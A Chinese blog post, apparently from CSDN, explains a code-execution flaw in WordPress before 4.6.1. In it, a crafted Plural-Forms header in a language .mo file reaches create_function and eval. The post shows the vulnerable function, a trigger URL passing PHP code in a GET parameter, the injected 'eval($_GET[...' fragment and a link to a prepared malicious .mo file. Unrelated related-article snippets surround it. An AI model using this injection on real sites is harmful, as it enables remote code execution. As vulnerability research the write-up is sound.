wordpress <4.6.1 语言文件导致的代码执行

最新推荐文章于 2021-09-18 17:20:00 发布
最新推荐文章于 2021-09-18 17:20:00 发布
阅读量419 收藏
点赞数
分类专栏: 安全研究 文章标签: php-代码审计
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u012795264/article/details/70170956
版权

1.原因:

create_function的误用

这里可以看到栈调用信息

http://127.0.0.1/wordpress/?c=$e=new%20Exception;%20var_dump($e-%3EgetTraceAsString());;
function make_plural_form_function($nplurals, $expression) {
    $expression = str_replace('n', '$n', $expression);
    $func_body = "
        \$index = (int)($expression);
        return (\$index < $nplurals)? \$index : $nplurals - 1;";
    return create_function('$n', $func_body);
}

修改header头,通过修改语言包mo文件(工具 PoEdit),闭合对应的语句,然后达到代码执行的目的,也可以下载大神修改好的mo自己测试 https://gist.github.com/anonymous/908a087b95035d9fc9ca46cef4984e97


string(1334) "#0 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171) : runtime-created function(2): eval() #1 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(171): create_function('$n', '\n\t\t\t$index = (i...') #2 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(224): Gettext_Translations->make_plural_form_function(1, 'n);}eval($_GET[...') #3 C:\xampp\htdocs\wordpress\wp-includes\pomo\translations.php(62): Gettext_Translations->set_header('Plural-Forms', 'nplurals=1; plu...') #4 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(210): Translations->set_headers(Array) #5 C:\xampp\htdocs\wordpress\wp-includes\pomo\mo.php(27): MO->import_from_reader(Object(POMO_FileReader)) #6 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(342): MO->import_from_file('C:\\xampp\\htdocs...') #7 C:\xampp\htdocs\wordpress\wp-includes\l10n.php(388): load_textdomain('default', 'C:\\xampp\\htdocs...') #8 C:\xampp\htdocs\wordpress\wp-settings.php(268): load_default_textdomain() #9 C:\xampp\htdocs\wordpress\wp-config.php(87): require_once('C:\\xampp\\htdocs...') #10 C:\xampp\htdocs\wordpress\wp-load.php(29): require_once('C:\\xampp\\htdocs...') #11 C:\xampp\htdocs\wordpress\wp-blog-header.php(12): require_once('C:\\xampp\\htdocs...') #12 C:\xampp\htdocs\wordpress\index.php(18): require('C:\\xampp\\htdocs...') #13 {main}"

效果图
这里写图片描述

qscft1234
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
wordpress-4.6.1
10-05
wordpress-4.6.1
WordPress 源码解读
jazywoo_在路上
08-07 1313
地图:index.php->wp-blog-header.php->wp-load.php->wp-config.php   index.php: 描述:前端入口,基本没有内容。 1)定义WP_USE_THEMES常量,当该常量定义为false时,站点会显示为空白;为true时则正常显示。 2)加载wp-blog-header.php文件
WordPress v4.6.1 正式版
12-04
WordPress是一个注重美学、易用性和网络标准的个人信息发布平台。WordPress 虽为的开源软件,但其价值是无法用金钱来衡量。使用WordPress可以搭建功能强大的网络信息发布平台,但更多的是应用于个性化的博客。针对博客的应用,WordPress能让您省却对后台
WordPress深度优化记录[10ms挑战]
midoks
04-24 152
配置我的插件,效果更佳。 https://github.com/midoks/wp-cache-db | [0SQL] php7.2 opcache wp-settings.php | load_default_textdomain 多语言加载,前台可以不加载 if (is_admin()) { load_default_textdomain(); $locale = get_locale(); $locale_file = WP_LANG_DIR .
wordpress 运行原理
qq_25194685的博客
10-13 724
wordpress 运行原理 在了解WordPress挂载机制时,一直有一个疑惑,到底是WordPress的内核源文件执行还是主题文件里functions.php文件执行。为了解决这个问题,想了解WordPress的工作原理,它是如何生成网页的,各程序文件执行顺序是什么,于是有了这篇文章。 WordPress所有的前端页面生成都要经过根目录下的index.php文件(不是主题根目录),这是通过Web服务器的rewrite规则实现的。然后通过index.php文件一步步引导WordPress环境启动,再
Eclipse4.6.1 代码自动补全插件文件
11-22
Eclipse 4.6.1代码自动补全插件文件,空格不会上屏
HTTP指挥官- 网文件经理 v4.6.1
12-30
HTTP指挥官- 网文件经理的历史可追溯到2002年和全球范围内在教育机构和公司使用. 该产品的主要目的机会 快速,方便地提供对文件和文档 出售的Windows服务器上,通过传统的Web浏览器通
DirectUpdate v4.6.1 多国语言
11-06
可以让您以静态的主机名称关联一个动态的IP 地址,而且无论何时您登录到您的ISP时,DirectUpdate可以保持IP地址的自动更新。这样您在家中拥有一个ISP帐号时,虽然每次登录时会有一个动态的IP地址,但你却可以把自己...
pomo php,wp-settings.php
weixin_28877703的博客
03-19 433
/*** Used to set up and fix common variables and include* the WordPress procedural and class library.** Allows for some configuration in wp-config.php (see default-constants.php)** @package WordPress*...
php 初始化顺序,wordpress启动初始化过程
weixin_30114595的博客
03-11 447
wordpress是免费开源的用php开发的博客平台,功能十分强大,中文友好,使用mysql数据库,安装非常方便。但是功能强大的同时也带来笨重、繁琐的感觉。这里尝试分析解读下wordpress的源码,也作为自己学习php的笔记。PS:php开发工具推荐zend studio。wordpress安装完毕后,在目录文件如下图:访问wordpress博客,默认定位到index.php文件,打开index...
命令执行漏洞php函数,PHP create_function注入命令执行漏洞
weixin_35755562的博客
03-16 446
PHP中使用create_function()创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。以如下代码为例://how to exp this code$sort_by=$_GET['sort_by'];$sorter='strnatcasecmp';$databases=array('test','test');$s...
从本地到WordPress代码注入
合天网安学院
09-18 285
什么是create_function?版本影响:注意:create_function在PHP7.2.0之后被废弃,因此该函数的适用范围在PHP 4 >= 4.0.1、PHP 5、 P...
WordPress前端代码展读
weixin_33866037的博客
11-01 400
本文的侧重点是:展示和解读WordPress从启动(即从index.php入口进入)到在网页上展示模板和内容的过程。这个过程可以分为3个阶段,一是初始化阶段,即初始化常量、环境、加载核心文件等等;二是内容处理阶段,即根据用户的请求调用相关函数获取和处理数据,为前端展示准备数据;三是主题应用阶段,在这个阶段,需要展示的数据已经准备完毕,需要根据用户的请求加载相应的主题模板,即对主题进行路由。经过这三...
WordPress 4.6(PHPMailer)命令执行漏洞 (CVE-2016-10033)
SoulCat
02-08 4649
WordPress &lt;= 4.6 命令执行漏洞(CVE-2016-10033) 漏洞概述: 当WordPress 使用 PHPMailer 组件向用户发送邮件。攻击者在找回密码时会使用PHPmailer发送重置密码的邮件,利用substr(字符串截取函数)、$run(系统调用函数)等构造payload,即可进行远程命令执行。 漏洞版本: WordPress &lt;= 4.6.0 PH...
代码审计从入门到放弃(一) & function
合天网安学院
03-07 507
前言题目概述漏洞点思考字符fuzzgetshell函数寻找getflag相关实验操作小结 前言CodeBreaking是ph牛搭建的代码审计挑战赛:https://code-...
回调、匿名函数和闭包
weixin_30443813的博客
05-14 130
(1) is_callable用来检测传进来的值能被call_user_func或者array_walk等函数使用,它非常智能,能够测试数组,数组形式的有效回调应该是以对象作为第一个元素,以方法名作为第二个元素,类似 array('new SomeClass()', 'someFunc')。 下面用例子来说明: 1 function a(){ 2 3 } 4 ...
wordpress的本地化技术(多语言)支持
简简单单,平平淡淡
01-05 4369
wordpress的本地化技术(多语言)支持: WordPress的开发者选择使用GNU gettext本地化框架来提供WordPress本地化的基本结构。Gettext是一个成熟的,广泛使用的,软件翻译模框架,而且是免费软件领域/开放源码本地化的实际标准。 gettext使用消息标准的翻译—就是说,显示给用户的每个"消息"都是单个翻译的,不管这个消息是一段话还是一个单词。在WordP
.net 4.6.1 autofac 读取配置文件动态注入IOC 详细代码
最新发布
06-13
好的,下面是一个使用 Autofac 读取配置文件并动态注入 IOC 的示例代码(基于 .NET Framework 4.6.1)。 首先,我们需要安装 Autofac 的 NuGet 包。在 Visual Studio 中,可以通过 NuGet 包管理器搜索并安装 Autofac。 然后,我们需要创建一个配置文件来定义我们的依赖项。假设我们的配置文件是一个 JSON 文件,如下所示: ```json { "dependencies": [ { "interface": "MyNamespace.IMyService", "type": "MyNamespace.MyService" } ] } ``` 在这个配置文件中,我们定义了一个名为 `dependencies` 的数组,其中包含一个或多个对象。每个对象都具有两个属性:`interface` 和 `type`。`interface` 属性指定依赖项的接口类型,`type` 属性指定依赖项的实现类型。 接下来,我们需要编写代码来读取配置文件并注册依赖项。下面是一个简单的示例: ```csharp using System.IO; using System.Reflection; using Autofac; using Newtonsoft.Json; public static class ContainerBuilderExtensions { public static void RegisterDependenciesFromConfigFile(this ContainerBuilder builder, string configFile) { var assembly = Assembly.GetExecutingAssembly(); var configPath = Path.Combine(Path.GetDirectoryName(assembly.Location), configFile); var json = File.ReadAllText(configPath); var dependencies = JsonConvert.DeserializeObject<dynamic>(json).dependencies; foreach (var dependency in dependencies) { var interfaceType = Type.GetType(dependency.interface.Value); var implementationType = Type.GetType(dependency.type.Value); builder.RegisterType(implementationType).As(interfaceType); } } } ``` 这个扩展方法将会读取指定的配置文件,并将其中定义的依赖项注册到 Autofac 的容器中。我们可以在应用程序的启动代码中调用这个方法,以便动态注入依赖项。 ```csharp var builder = new ContainerBuilder(); builder.RegisterDependenciesFromConfigFile("dependencies.json"); var container = builder.Build(); // 从容器中解析需要的依赖项 var service = container.Resolve<IMyService>(); ``` 在这个示例中,我们首先创建了一个 `ContainerBuilder` 对象,并注册了一个扩展方法 `RegisterDependenciesFromConfigFile`。然后,我们在应用程序的启动代码中调用这个方法,并使用 `Build` 方法构建一个 Autofac 容器。最后,我们可以通过调用 `Resolve` 方法来从容器中解析需要的依赖项。 注意,我们在这个示例中使用了 Newtonsoft.Json 库来解析 JSON 配置文件。我们还使用了 `Assembly.GetExecutingAssembly().Location` 来获取当前执行程序的路径,然后使用 `Path.Combine` 和 `File.ReadAllText` 方法来读取配置文件。你也可以使用其他方法来读取配置文件,例如使用 `ConfigurationManager` 类或使用 `System.Text.Json` 库。 希望这个示例能够帮助你了解如何使用 Autofac 读取配置文件并动态注入依赖项。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值